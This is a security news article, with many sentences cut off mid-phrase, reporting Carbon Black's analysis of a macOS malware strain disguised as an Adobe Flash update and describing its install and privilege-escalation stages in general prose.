Security experts at Carbon Black have recently spotted a new strain of the
The malware poses as an Adobe Flash update it was distributed through a large number of websites, fake or compromised legitimate domains.
“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.
“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from
This variant of the
The malware uses legitimate system applications via bash to conduct all installation activity.
Once the installer is launched, a
The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using
The malicious script attempts to download the password-protected ZIP file using
The script also makes the binary within the unzipped .app executable using
The second stage malware attempts to escalate privileges with
“After the second stage payload is downloaded and executed, it attempts to escalate privileges with
“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be
Carbon Black’s analysis includes Indicators of Compromise.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.